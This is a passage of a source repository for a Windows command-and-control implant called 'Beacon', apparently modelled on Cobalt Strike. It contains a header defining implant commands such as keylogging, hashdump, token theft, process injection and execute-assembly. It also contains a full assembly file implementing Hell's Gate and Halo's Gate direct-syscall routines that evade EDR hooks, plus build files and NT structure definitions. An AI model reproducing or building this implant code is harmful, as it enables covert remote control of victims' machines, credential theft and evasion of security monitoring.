| void BeaconSpawn(char* Taskdata, int Task_size); 81 | void BeaconReflectiveDLLInject(char* payload, int payloadsize); 82 | int BeaconDataCopyToBuffer1(datap* parser, char* buffer, int buffer_size); 83 | 84 | 85 | 86 | BOOL is_admin(); 87 | int BeaconSpawnTemporaryProcess(BOOL x86, BOOL ignoreToken, STARTUPINFOA* sInfo, PROCESS_INFORMATION* pInfo); 88 | void BeaconcloseAllHandle(PROCESS_INFORMATION* pi); 89 | BOOL __cdecl toWideChar(char* lpMultiByteStr, wchar_t* lpWideCharStr, unsigned int max); 90 | char* BeaconFormatOriginalPtr(formatp* format); 91 | int CheckMemoryRWX(LPVOID lpAddress, SIZE_T dwSize); 92 | char* BeaconDataPtr3(datap* parser, int* outsize); 93 | #define CALLBACK_OUTPUT 0 94 | #define CALLBACK_KEYSTROKES 1 95 | #define CALLBACK_FILE 2 96 | #define CALLBACK_SCREENSHOT 3 97 | #define CALLBACK_CLOSE 4 98 | #define CALLBACK_READ 5 99 | #define CALLBACK_CONNECT 6 100 | #define CALLBACK_PING 7 101 | #define CALLBACK_FILE_WRITE 8 102 | #define CALLBACK_FILE_CLOSE 9 103 | #define CALLBACK_PIPE_OPEN 10 104 | #define CALLBACK_PIPE_CLOSE 11 105 | #define CALLBACK_PIPE_READ 12 106 | #define CALLBACK_POST_ERROR 13 107 | #define CALLBACK_PIPE_PING 14 108 | #define CALLBACK_TOKEN_STOLEN 15 109 | #define CALLBACK_TOKEN_GETUID 16 110 | #define CALLBACK_PROCESS_LIST 17 111 | #define CALLBACK_POST_REPLAY_ERROR 18 112 | #define CALLBACK_PWD 19 113 | #define CALLBACK_JOBS 20 114 | #define CALLBACK_HASHDUMP 21 115 | #define CALLBACK_PENDING 22 116 | #define CALLBACK_ACCEPT 23 117 | #define CALLBACK_NETVIEW 24 118 | #define CALLBACK_PORTSCAN 25 119 | #define CALLBACK_DEAD 26 120 | #define CALLBACK_SSH_STATUS 27 121 | #define CALLBACK_CHUNK_ALLOCATE 28 122 | #define CALLBACK_CHUNK_SEND 29 123 | #define CALLBACK_OUTPUT_OEM 30 124 | #define CALLBACK_ERROR 31 125 | #define CALLBACK_OUTPUT_UTF8 32 126 | #define CMD_TYPE_SLEEP 4 127 | #define CMD_TYPE_PAUSE 47 128 | #define CMD_TYPE_SHELL 78 129 | #define CMD_TYPE_UPLOAD_START 10 130 | #define CMD_TYPE_UPLOAD_LOOP 67 131 | #define CMD_TYPE_DOWNLOAD 11 132 | #define CMD_TYPE_Jobs 41 133 | #define CMD_TYPE_Jobskill 42 134 | #define CMD_TYPE_EXIT 3 135 | #define CMD_TYPE_CD 5 136 | #define CMD_TYPE_PWD 39 137 | #define CMD_TYPE_FILE_BROWSE 53 138 | #define CMD_TYPE_SPAWN_X64 44 139 | #define CMD_TYPE_SPAWN_X86 1 140 | #define CMD_TYPE_EXECUTE 12 141 | #define CMD_TYPE_GETUID 27 142 | #define CMD_TYPE_GET_PRIVS 77 143 | #define CMD_TYPE_STEAL_TOKEN 31 144 | #define CMD_TYPE_PS 32 145 | #define CMD_TYPE_KILL 33 146 | #define CMD_TYPE_DRIVES 55 147 | #define CMD_TYPE_RUNAS 38 148 | #define CMD_TYPE_MKDIR 54 149 | #define CMD_TYPE_RM 56 150 | #define CMD_TYPE_CP 73 151 | #define CMD_TYPE_MV 74 152 | #define CMD_TYPE_REV2SELF 28 153 | #define CMD_TYPE_MAKE_TOKEN 49 154 | #define CMD_TYPE_PIPE 40 155 | #define CMD_TYPE_PORTSCAN_X86 89 156 | #define CMD_TYPE_PORTSCAN_X64 90 157 | #define CMD_TYPE_KEYLOGGER 101 158 | #define CMD_TYPE_EXECUTE_ASSEMBLY_X64 88 159 | #define CMD_TYPE_EXECUTE_ASSEMBLY_X86 87 160 | #define CMD_TYPE_EXECUTE_ASSEMBLY_TOKEN_X64 71 161 | #define CMD_TYPE_EXECUTE_ASSEMBLY_TOKEN_X86 70 162 | #define CMD_TYPE_IMPORT_POWERSHELL 37 163 | #define CMD_TYPE_POWERSHELL_PORT 79 164 | #define CMD_TYPE_INJECT_X64 43 165 | #define CMD_TYPE_INJECT_X86 9 166 | #define CMD_TYPE_BOF 100 167 | #define CMD_TYPE_RUNU 76 168 | #define CMD_TYPE_ARGUE_QUERY 85 169 | #define CMD_TYPE_ARGUE_REMOVE 84 170 | #define CMD_TYPE_ARGUE_ADD 83 171 | #define CMD_TYPE_DumpHHH 103 -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | ## 4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 5 | 6 | # User-specific files 7 | *.rsuser 8 | *.suo 9 | *.user 10 | *.userosscache 11 | *.sln.docstates 12 | 13 | # User-specific files (MonoDevelop/Xamarin Studio) 14 | *.userprefs 15 | 16 | # Mono auto generated files 17 | mono_crash.* 18 | 19 | # Build results 20 | [Dd]ebug/ 21 | [Dd]ebugPublic/ 22 | [Rr]elease/ 23 | [Rr]eleases/ 24 | x64/ 25 | x86/ 26 | [Ww][Ii][Nn]32/ 27 | [Aa][Rr][Mm]/ 28 | [Aa][Rr][Mm]64/ 29 | bld/ 30 | [Bb]in/ 31 | [Oo]bj/ 32 | [Oo]ut/ 33 | [Ll]og/ 34 | [Ll]ogs/ 35 | 36 | # Visual Studio 2015/2017 cache/options directory 37 | .vs/ 38 | # Uncomment if you have tasks that create the project's static files in wwwroot 39 | #wwwroot/ 40 | 41 | # Visual Studio 2017 auto generated files 42 | Generated\ Files/ 43 | 44 | # MSTest test Results 45 | [Tt]est[Rr]esult*/ 46 | [Bb]uild[Ll]og.* 47 | 48 | # NUnit 49 | *.VisualState.xml 50 | TestResult.xml 51 | nunit-*.xml 52 | 53 | # Build Results of an ATL Project 54 | [Dd]ebugPS/ 55 | [Rr]eleasePS/ 56 | dlldata.c 57 | 58 | # Benchmark Results 59 | BenchmarkDotNet.Artifacts/ 60 | 61 | # .NET Core 62 | project.lock.json 63 | project.fragment.lock.json 64 | artifacts/ 65 | 66 | # ASP.NET Scaffolding 67 | ScaffoldingReadMe.txt 68 | 69 | # StyleCop 70 | StyleCopReport.xml 71 | 72 | # Files built by Visual Studio 73 | *_i.c 74 | *_p.c 75 | *_h.h 76 | *.ilk 77 | *.meta 78 | *.obj 79 | *.iobj 80 | *.pch 81 | *.pdb 82 | *.ipdb 83 | *.pgc 84 | *.pgd 85 | *.rsp 86 | *.sbr 87 | *.tlb 88 | *.tli 89 | *.tlh 90 | *.tmp 91 | *.tmp_proj 92 | *_wpftmp.csproj 93 | *.log 94 | *.vspscc 95 | *.vssscc 96 | .builds 97 | *.pidb 98 | *.svclog 99 | *.scc 100 | 101 | # Chutzpah Test files 102 | _Chutzpah* 103 | 104 | # Visual C++ cache files 105 | ipch/ 106 | *.aps 107 | *.ncb 108 | *.opendb 109 | *.opensdf 110 | *.sdf 111 | *.cachefile 112 | *.VC.db 113 | *.VC.VC.opendb 114 | 115 | # Visual Studio profiler 116 | *.psess 117 | *.vsp 118 | *.vspx 119 | *.sap 120 | 121 | # Visual Studio Trace Files 122 | *.e2e 123 | 124 | # TFS 2012 Local Workspace 125 | $tf/ 126 | 127 | # Guidance Automation Toolkit 128 | *.gpState 129 | 130 | # ReSharper is a .NET coding add-in 131 | _ReSharper*/ 132 | *.[Rr]e[Ss]harper 133 | *.DotSettings.user 134 | 135 | # TeamCity is a build add-in 136 | _TeamCity* 137 | 138 | # DotCover is a Code Coverage Tool 139 | *.dotCover 140 | 141 | # AxoCover is a Code Coverage Tool 142 | .axoCover/* 143 | !.axoCover/settings.json 144 | 145 | # Coverlet is a free, cross platform Code Coverage Tool 146 | coverage*.json 147 | coverage*.xml 148 | coverage*.info 149 | 150 | # Visual Studio code coverage results 151 | *.coverage 152 | *.coveragexml 153 | 154 | # NCrunch 155 | _NCrunch_* 156 | .*crunch*.local.xml 157 | nCrunchTemp_* 158 | 159 | # MightyMoose 160 | *.mm.* 161 | AutoTest.Net/ 162 | 163 | # Web workbench (sass) 164 | .sass-cache/ 165 | 166 | # Installshield output folder 167 | [Ee]xpress/ 168 | 169 | # DocProject is a documentation generator add-in 170 | DocProject/buildhelp/ 171 | DocProject/Help/*.HxT 172 | DocProject/Help/*.HxC 173 | DocProject/Help/*.hhc 174 | DocProject/Help/*.hhk 175 | DocProject/Help/*.hhp 176 | DocProject/Help/Html2 177 | DocProject/Help/html 178 | 179 | # Click-Once directory 180 | publish/ 181 | 182 | # Publish Web Output 183 | *.[Pp]ublish.xml 184 | *.azurePubxml 185 | # Note: Comment the next line if you want to checkin your web deploy settings, 186 | # but database connection strings (with potential passwords) will be unencrypted 187 | *.pubxml 188 | *.publishproj 189 | 190 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 191 | # checkin your Azure Web App publish settings, but sensitive information contained 192 | # in these scripts will be unencrypted 193 | PublishScripts/ 194 | 195 | # NuGet Packages 196 | *.nupkg 197 | # NuGet Symbol Packages 198 | *.snupkg 199 | # The packages folder can be ignored because of Package Restore 200 | **/[Pp]ackages/* 201 | # except build/, which is used as an MSBuild target. 202 | !**/[Pp]ackages/build/ 203 | # Uncomment if necessary however generally it will be regenerated when needed 204 | #!**/[Pp]ackages/repositories.config 205 | # NuGet v3's project.json files produces more ignorable files 206 | *.nuget.props 207 | *.nuget.targets 208 | 209 | # Microsoft Azure Build Output 210 | csx/ 211 | *.build.csdef 212 | 213 | # Microsoft Azure Emulator 214 | ecf/ 215 | rcf/ 216 | 217 | # Windows Store app package directories and files 218 | AppPackages/ 219 | BundleArtifacts/ 220 | Package.StoreAssociation.xml 221 | _pkginfo.txt 222 | *.appx 223 | *.appxbundle 224 | *.appxupload 225 | 226 | # Visual Studio cache files 227 | # files ending in .cache can be ignored 228 | *.[Cc]ache 229 | # but keep track of directories ending in .cache 230 | !?*.[Cc]ache/ 231 | 232 | # Others 233 | ClientBin/ 234 | ~$* 235 | *~ 236 | *.dbmdl 237 | *.dbproj.schemaview 238 | *.jfm 239 | *.pfx 240 | *.publishsettings 241 | orleans.codegen.cs 242 | 243 | # Including strong name files can present a security risk 244 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 245 | #*.snk 246 | 247 | # Since there are multiple workflows, uncomment next line to ignore bower_components 248 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 249 | #bower_components/ 250 | 251 | # RIA/Silverlight projects 252 | Generated_Code/ 253 | 254 | # Backup & report files from converting an old project file 255 | # to a newer Visual Studio version. Backup files are not needed, 256 | # because we have git ;-) 257 | _UpgradeReport_Files/ 258 | Backup*/ 259 | UpgradeLog*.XML 260 | UpgradeLog*.htm 261 | ServiceFabricBackup/ 262 | *.rptproj.bak 263 | 264 | # SQL Server files 265 | *.mdf 266 | *.ldf 267 | *.ndf 268 | 269 | # Business Intelligence projects 270 | *.rdl.data 271 | *.bim.layout 272 | *.bim_*.settings 273 | *.rptproj.rsuser 274 | *- [Bb]ackup.rdl 275 | *- [Bb]ackup ([0-9]).rdl 276 | *- [Bb]ackup ([0-9][0-9]).rdl 277 | 278 | # Microsoft Fakes 279 | FakesAssemblies/ 280 | 281 | # GhostDoc plugin setting file 282 | *.GhostDoc.xml 283 | 284 | # Node.js Tools for Visual Studio 285 | .ntvs_analysis.dat 286 | node_modules/ 287 | 288 | # Visual Studio 6 build log 289 | *.plg 290 | 291 | # Visual Studio 6 workspace options file 292 | *.opt 293 | 294 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 295 | *.vbw 296 | 297 | # Visual Studio LightSwitch build output 298 | **/*.HTMLClient/GeneratedArtifacts 299 | **/*.DesktopClient/GeneratedArtifacts 300 | **/*.DesktopClient/ModelManifest.xml 301 | **/*.Server/GeneratedArtifacts 302 | **/*.Server/ModelManifest.xml 303 | _Pvt_Extensions 304 | 305 | # Paket dependency manager 306 | .paket/paket.exe 307 | paket-files/ 308 | 309 | # FAKE - F# Make 310 | .fake/ 311 | 312 | # CodeRush personal settings 313 | .cr/personal 314 | 315 | # Python Tools for Visual Studio (PTVS) 316 | __pycache__/ 317 | *.pyc 318 | 319 | # Cake - Uncomment if you are using it 320 | # tools/** 321 | # !tools/packages.config 322 | 323 | # Tabs Studio 324 | *.tss 325 | 326 | # Telerik's JustMock configuration file 327 | *.jmconfig 328 | 329 | # BizTalk build output 330 | *.btp.cs 331 | *.btm.cs 332 | *.odx.cs 333 | *.xsd.cs 334 | 335 | # OpenCover UI analysis results 336 | OpenCover/ 337 | 338 | # Azure Stream Analytics local run output 339 | ASALocalRun/ 340 | 341 | # MSBuild Binary and Structured Log 342 | *.binlog 343 | 344 | # NVidia Nsight GPU debugger configuration file 345 | *.nvuser 346 | 347 | # MFractors (Xamarin productivity tool) working folder 348 | .mfractor/ 349 | 350 | # Local History for Visual Studio 351 | .localhistory/ 352 | 353 | # BeatPulse healthcheck temp database 354 | healthchecksdb 355 | 356 | # Backup folder for Package Reference Convert tool in Visual Studio 2017 357 | MigrationBackup/ 358 | 359 | # Ionide (cross platform F# VS Code tools) working folder 360 | .ionide/ 361 | 362 | # Fody - auto-generated XML schema 363 | FodyWeavers.xsd -------------------------------------------------------------------------------- /Beacon/bcookesHalosGate.asm: -------------------------------------------------------------------------------- 1 | ; Author: Bobby Cooke @0xBoku | https://github.com/boku7 | https://0xBoku.com | https://www.linkedin.com/in/bobby-cooke/ 2 | ; Credits / References: Pavel Yosifovich (@zodiacon),Reenz0h from @SEKTOR7net, @smelly__vx & @am0nsec ( Creators/Publishers of the Hells Gate technique) 3 | 4 | .code 5 | 6 | getntdll PROC 7 | xor rdi, rdi ; RDI = 0x0 8 | mul rdi ; RAX&RDX =0x0 9 | mov rbx, gs:[rax+60h] ; RBX = Address_of_PEB 10 | mov rbx, [rbx+18h] ; RBX = Address_of_LDR 11 | mov rbx, [rbx+20h] ; 12 | mov rbx, [rbx] ; RBX = 1st entry in InitOrderModuleList / ntdll.dll 13 | mov rbx, [rbx+20h] ; RBX = &ntdll.dll ( Base Address of ntdll.dll) 14 | mov rax, rbx ; RBX & RAX = &ntdll.dll 15 | ret ; return to caller 16 | getntdll ENDP 17 | 18 | ; Get ExportTable Address of supplied module DLL 19 | getExportTable PROC 20 | mov rbx, rcx ; RBX = Supplied Module Address 21 | mov r8, rcx ; R8 = Supplied Module Address 22 | mov ebx, [rbx+3Ch] ; RBX = Offset NewEXEHeader 23 | add rbx, r8 ; RBX = &ntdll.dll + Offset NewEXEHeader = &NewEXEHeader 24 | xor rcx, rcx ; Avoid null bytes from mov edx,[rbx+0x88] by using rcx register to add 25 | add cx, 88ffh 26 | shr rcx, 8h ; RCX = 0x88ff --> 0x88 27 | mov edx, [rbx+rcx] ; EDX = [&NewEXEHeader + Offset RVA ExportTable] = RVA ExportTable 28 | add rdx, r8 ; RDX = &ntdll.dll + RVA ExportTable = &ExportTable 29 | mov rax, rdx ; RAX = &module.ExportTable 30 | ret ; return to caller 31 | getExportTable ENDP 32 | 33 | ; Get &module.ExportTable.AddressTable from &module.ExportTable 34 | getExAddressTable PROC 35 | mov r8, rdx ; R8 = &module.dll 36 | mov rdx, rcx ; RDX = &module.ExportTable 37 | xor r10, r10 38 | mov r10d, [rdx+1Ch] ; RDI = RVA AddressTable 39 | add r10, r8 ; R10 = &AddressTable 40 | mov rax, r10 ; RAX = &module.ExportTable.AddressTable 41 | ret ; return to caller 42 | getExAddressTable ENDP 43 | 44 | ; Get &module.NamePointerTable from &module.ExportTable 45 | getExNamePointerTable PROC 46 | mov r8, rdx ; R8 = &module.dll 47 | mov rdx, rcx ; RDX = &module.ExportTable 48 | xor r11, r11 49 | mov r11d, [rdx+20h] ; R11 = [&ExportTable + Offset RVA Name PointerTable] = RVA NamePointerTable 50 | add r11, r8 ; R11 = &NamePointerTable (Memory Address of module Export NamePointerTable) 51 | mov rax, r11 ; RAX = &module.ExportTable.NamePointerTable 52 | ret ; return to caller 53 | getExNamePointerTable ENDP 54 | 55 | ; Get &OrdinalTable from ntdll.dll ExportTable 56 | getExOrdinalTable PROC 57 | mov r8, rdx ; R8 = &module.dll 58 | mov rdx, rcx ; RDX = &module.ExportTable 59 | xor r12, r12 60 | mov r12d, [rdx+24h] ; R12 = RVA OrdinalTable 61 | add r12, r8 ; R12 = &OrdinalTable 62 | mov rax, r12 ; RAX = &module.ExportTable.OrdinalTable 63 | ret ; return to caller 64 | getExOrdinalTable ENDP 65 | 66 | ; Get the address of the API from the module ExportTable 67 | ; IN: &Module.ExportTable.NamePointerTable + &Module 68 | getApiAddr PROC 69 | mov r10, r9 ; R10 = &module.ExportTable.AddressTable 70 | mov r11, [rsp+28h] ; R11 = &module.ExportTable.NamePointerTable 71 | mov r12, [rsp+30h] ; R12 = &module.ExportTable.OrdinalTable 72 | xor rax, rax ; Setup Counter for resolving the API Address after finding the name string 73 | push rcx ; push the string length counter to stack 74 | jmp short getApiAddrLoop 75 | getApiAddr ENDP 76 | 77 | getApiAddrLoop PROC 78 | mov rcx, [rsp] ; reset the string length counter from the stack 79 | xor rdi, rdi ; Clear RDI for setting up string name retrieval 80 | mov edi, [r11+rax*4] ; EDI = RVA NameString = [&NamePointerTable + (Counter * 4)] 81 | add rdi, r8 ; RDI = &NameString = RVA NameString + &module.dll 82 | mov rsi, rdx ; RSI = Address of API Name String to match on the Stack (reset to start of string) 83 | repe cmpsb ; Compare strings at RDI & RSI 84 | je getApiAddrFin ; If match then we found the API string. Now we need to find the Address of the API 85 | inc rax 86 | jmp short getApiAddrLoop 87 | getApiAddrLoop ENDP 88 | 89 | ; Find the address of GetProcAddress by using the last value of the Counter 90 | getApiAddrFin PROC 91 | pop rcx ; remove string length counter from top of stack 92 | mov ax, [r12+rax*2] ; RAX = [&OrdinalTable + (Counter*2)] = ordinalNumber of module. 93 | mov eax, [r10+rax*4] ; RAX = RVA API = [&AddressTable + API OrdinalNumber] 94 | add rax, r8 ; RAX = module. = RVA module. + module.dll BaseAddress 95 | ret ; return to API caller 96 | getApiAddrFin ENDP 97 | 98 | ; Find the syscall number for the NTDLL API with provided API address 99 | ; RCX = NTDLL. Address 100 | findSyscallNumber PROC 101 | xor rsi, rsi 102 | xor rdi, rdi 103 | mov rsi, 00B8D18B4Ch ; bytes at start of NTDLL stub to setup syscall in RAX 104 | mov edi, [rcx] ; RDI = first 4 bytes of NTDLL API syscall stub (mov r10,rcx;mov eax,) 105 | cmp rsi, rdi 106 | jne error ; if the bytes dont match then its prob hooked. Exit gracefully 107 | xor rax,rax ; clear RAX as it will hold the syscall 108 | mov ax, [rcx+4] ; The systemcall number 109 | ret ; return to caller 110 | findSyscallNumber ENDP 111 | 112 | ; RCX = &NTDLL. | RDX = 32bytes * Up Increment 113 | halosGateUp PROC 114 | xor rsi, rsi 115 | xor rdi, rdi 116 | mov rsi, 00B8D18B4Ch ; bytes at start of NTDLL stub to setup syscall in RAX 117 | xor rax, rax 118 | mov al, 20h ; 32 * Increment = Syscall Up 119 | mul dx ; RAX = RAX * RDX = 32 * Syscall Up 120 | add rcx, rax ; RCX = NTDLL.API +- Syscall Stub 121 | mov edi, [rcx] ; RDI = first 4 bytes of NTDLL API syscall stub, incremented Up by HalosGate (mov r10, rcx; mov eax, ) 122 | cmp rsi, rdi 123 | jne error ; if the bytes dont match then its prob hooked. Exit gracefully 124 | xor rax,rax ; clear RAX as it will hold the syscall 125 | mov ax, [rcx+4] ; The systemcall number for the API close to the target 126 | ret ; return to caller 127 | halosGateUp ENDP 128 | 129 | ; RCX = &NTDLL. | RDX = 32bytes * Down Increment 130 | halosGateDown PROC 131 | xor rsi, rsi 132 | xor rdi, rdi 133 | mov rsi, 00B8D18B4Ch ; bytes at start of NTDLL stub to setup syscall in RAX 134 | xor rax, rax 135 | mov al, 20h ; 32 * Increment = Syscall Down 136 | mul dx ; RAX = RAX * RDX = 32 * Syscall Down 137 | sub rcx, rax ; RCX = NTDLL.API - Syscall Stub 138 | mov edi, [rcx] ; RDI = first 4 bytes of NTDLL API syscall stub, incremented Down by HalosGate (mov r10, rcx; mov eax, ) 139 | cmp rsi, rdi 140 | jne error ; if the bytes dont match then its prob hooked. Exit gracefully 141 | xor rax,rax ; clear RAX as it will hold the syscall 142 | mov ax, [rcx+4] ; The systemcall number for the API close to the target 143 | ret ; return to caller 144 | halosGateDown ENDP 145 | 146 | error PROC 147 | xor rax, rax ; return 0 for error 148 | ret ; return to caller 149 | error ENDP 150 | 151 | HellsGate PROC 152 | xor r11, r11 153 | mov r11d, ecx 154 | ret 155 | HellsGate ENDP 156 | 157 | HellDescent PROC 158 | xor rax, rax 159 | mov r10, rcx 160 | mov eax, r11d 161 | syscall 162 | ret 163 | HellDescent ENDP 164 | 165 | compExplorer PROC 166 | xor rsi, rsi 167 | cmp rsi, rcx 168 | je error ; This is a null entry, skip this one 169 | mov rsi, 6c007000780065h ; unicode "expl" 170 | mov rdx, [rcx] ; move the first 4 characters of the string into RCX register 171 | cmp rsi, rdx 172 | jne error ; if the bytes dont its match not "expl", try the next one 173 | mov rsi, 7200650072006fh ; 6f 00 72 00 65 00 72 00 o.r.e.r. 174 | mov rdx, [rcx+8h] ; move the next 4 characters of the string into RCX register "orer" 175 | cmp rsi, rdx 176 | jne error ; if the bytes dont match its not "explorer", try the next one 177 | mov rsi, 6500780065002eh ; 2e 00 65 00 78 00 65 00 ..e.x.e. 178 | mov rdx, [rcx+10h] ; move the next 4 characters of the string into RCX register ".exe" 179 | cmp rsi, rdx 180 | jne error ; if the bytes dont match its not "explorer.exe", try the next one 181 | mov rax, 1h ; found "explorer.exe" return true 182 | ret 183 | compExplorer ENDP 184 | 185 | end 186 | -------------------------------------------------------------------------------- /Beacon/Beacon.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {191a6f50-ae83-44d1-8446-9afb9a077a97} 25 | Beacon 26 | 10.0 27 | x86-windows-static 28 | x64-windows-static 29 | 30 | 31 | 32 | Application 33 | true 34 | v143 35 | Unicode 36 | 37 | 38 | Application 39 | false 40 | v143 41 | true 42 | Unicode 43 | 44 | 45 | Application 46 | true 47 | v143 48 | Unicode 49 | 50 | 51 | Application 52 | false 53 | v143 54 | true 55 | Unicode 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | false 78 | C:\Users\test\Desktop\vcpkg-2023.08.09\vcpkg-2023.08.09\packages\curl_x64-windows\include\curl;C:\Users\test\Desktop\vcpkg-2023.08.09\vcpkg-2023.08.09\packages\openssl_x64-windows\include\openssl;$(IncludePath) 79 | C:\Users\test\Desktop\vcpkg-2023.08.09\vcpkg-2023.08.09\packages\curl_x64-windows\lib;C:\Users\test\Desktop\vcpkg-2023.08.09\vcpkg-2023.08.09\packages\openssl_x64-windows\lib;$(LibraryPath) 80 | 81 | 82 | 83 | Level3 84 | true 85 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 86 | true 87 | 88 | 89 | Console 90 | true 91 | 92 | 93 | 94 | 95 | Level3 96 | true 97 | true 98 | true 99 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 100 | true 101 | 102 | 103 | Console 104 | true 105 | true 106 | true 107 | 108 | 109 | 110 | 111 | Level3 112 | true 113 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 114 | true 115 | 4996 116 | MultiThreadedDebug 117 | true 118 | 119 | 120 | Console 121 | true 122 | dbghelp.lib;Crypt32.lib;%(AdditionalDependencies) 123 | RequireAdministrator 124 | 125 | 126 | 127 | 128 | Level3 129 | true 130 | true 131 | true 132 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 133 | true 134 | MultiThreadedDebug 135 | true 136 | Default 137 | Disabled 138 | false 139 | 140 | 141 | Console 142 | true 143 | true 144 | false 145 | RequireAdministrator 146 | dbghelp.lib;zlib.lib;Crypt32.lib;%(AdditionalDependencies) 147 | 148 | 149 | 150 | 151 | false 152 | MultiThreadedDebug 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | 165 | 166 | 167 | 168 | 169 | 170 | 171 | 172 | 173 | 174 | 175 | 176 | 177 | 178 | 179 | 180 | 181 | 182 | false 183 | 184 | 185 | 186 | 187 | 188 | 189 | -------------------------------------------------------------------------------- /Beacon/ntdef.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include "GuangMing.h" 4 | 5 | // most of this header code took from --> https://github.com/hfiref0x/NtCall64/blob/master/Source/NtCall64/ntos.h 6 | // credits to @hfiref0x 7 | 8 | #define STATUS_INFO_LENGTH_MISMATCH 0xc0000004 9 | #define STATUS_INSUFFICIENT_RESOURCES 0xC0000009A 10 | #define STATUS_NOT_FOUND 0xC0000225 11 | #define SystemHandleInformation 16 12 | 13 | #ifndef RtlOffsetToPointer 14 | #define RtlOffsetToPointer(Base, Offset) ((PCHAR)( ((PCHAR)(Base)) + ((ULONG_PTR)(Offset)) )) 15 | #endif 16 | 17 | 18 | #ifndef ALIGN_UP_TYPE 19 | #define ALIGN_UP_TYPE(Address, Align) (((ULONG_PTR)(Address) + (Align) - 1) & ~((Align) - 1)) 20 | #endif 21 | 22 | #ifndef ALIGN_UP 23 | #define ALIGN_UP(Address, Type) ALIGN_UP_TYPE(Address, sizeof(Type)) 24 | #endif 25 | 26 | #ifndef RTL_CONSTANT_STRING 27 | char _RTL_CONSTANT_STRING_type_check(const void* s); 28 | #define _RTL_CONSTANT_STRING_remove_const_macro(s) (s) 29 | #define RTL_CONSTANT_STRING(s) \ 30 | { \ 31 | sizeof( s ) - sizeof( (s)[0] ), \ 32 | sizeof( s ) / sizeof(_RTL_CONSTANT_STRING_type_check(s)), \ 33 | _RTL_CONSTANT_STRING_remove_const_macro(s) \ 34 | } 35 | #endif 36 | 37 | #define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0) 38 | #define OBJECT_TYPES_FIRST_ENTRY(ObjectTypes) (POBJECT_TYPE_INFORMATION)\ 39 | RtlOffsetToPointer(ObjectTypes, ALIGN_UP(sizeof(OBJECT_TYPES_INFORMATION), ULONG_PTR)) 40 | 41 | #define OBJECT_TYPES_NEXT_ENTRY(ObjectType) (POBJECT_TYPE_INFORMATION)\ 42 | RtlOffsetToPointer(ObjectType, sizeof(OBJECT_TYPE_INFORMATION) + \ 43 | ALIGN_UP(ObjectType->TypeName.MaximumLength, ULONG_PTR)) 44 | 45 | //typedef struct _CLIENT_ID { 46 | // HANDLE UniqueProcess; 47 | // HANDLE UniqueThread; 48 | //} CLIENT_ID; 49 | 50 | typedef struct _GDI_TEB_BATCH 51 | { 52 | ULONG Offset; 53 | HANDLE HDC; 54 | ULONG Buffer[310]; 55 | } GDI_TEB_BATCH; 56 | 57 | //typedef struct _UNICODE_STRING { 58 | // USHORT Length; 59 | // USHORT MaximumLength; 60 | // PWSTR Buffer; 61 | //} UNICODE_STRING, * PUNICODE_STRING; 62 | 63 | typedef struct _TEB 64 | { 65 | NT_TIB NtTib; 66 | PVOID EnvironmentPointer; 67 | CLIENT_ID ClientId; 68 | PVOID ActiveRpcHandle; 69 | PVOID ThreadLocalStoragePointer; 70 | PVOID ProcessEnvironmentBlock; 71 | ULONG LastErrorValue; 72 | ULONG CountOfOwnedCriticalSections; 73 | PVOID CsrClientThread; 74 | PVOID Win32ThreadInfo; 75 | ULONG User32Reserved[26]; 76 | ULONG UserReserved[5]; 77 | PVOID WOW32Reserved; 78 | LCID CurrentLocale; 79 | ULONG FpSoftwareStatusRegister; 80 | PVOID SystemReserved1[54]; 81 | LONG ExceptionCode; 82 | UCHAR Padding0[4]; 83 | PVOID ActivationContextStackPointer; 84 | UCHAR SpareBytes[24]; 85 | ULONG TxFsContext; 86 | GDI_TEB_BATCH GdiTebBatch; 87 | CLIENT_ID RealClientId; 88 | PVOID GdiCachedProcessHandle; 89 | ULONG GdiClientPID; 90 | ULONG GdiClientTID; 91 | PVOID GdiThreadLocalInfo; 92 | SIZE_T Win32ClientInfo[62]; 93 | PVOID glDispatchTable[233]; 94 | SIZE_T glReserved1[29]; 95 | PVOID glReserved2; 96 | PVOID glSectionInfo; 97 | PVOID glSection; 98 | PVOID glTable; 99 | PVOID glCurrentRC; 100 | PVOID glContext; 101 | ULONG LastStatusValue; 102 | UCHAR Padding2[4]; 103 | UNICODE_STRING StaticUnicodeString; 104 | WCHAR StaticUnicodeBuffer[261]; 105 | UCHAR Padding3[6]; 106 | PVOID DeallocationStack; 107 | PVOID TlsSlots[64]; 108 | LIST_ENTRY TlsLinks; 109 | PVOID Vdm; 110 | PVOID ReservedForNtRpc; 111 | PVOID DbgSsReserved[2]; 112 | ULONG HardErrorMode; 113 | UCHAR Padding4[4]; 114 | PVOID Instrumentation[11]; 115 | GUID ActivityId; 116 | PVOID SubProcessTag; 117 | PVOID EtwLocalData; 118 | PVOID EtwTraceData; 119 | PVOID WinSockData; 120 | ULONG GdiBatchCount; 121 | union 122 | { 123 | PROCESSOR_NUMBER CurrentIdealProcessor; 124 | ULONG32 IdealProcessorValue; 125 | struct 126 | { 127 | UCHAR ReservedPad0; 128 | UCHAR ReservedPad1; 129 | UCHAR ReservedPad2; 130 | UCHAR IdealProcessor; 131 | }; 132 | }; 133 | ULONG GuaranteedStackBytes; 134 | UCHAR Padding5[4]; 135 | PVOID ReservedForPerf; 136 | PVOID ReservedForOle; 137 | ULONG WaitingOnLoaderLock; 138 | 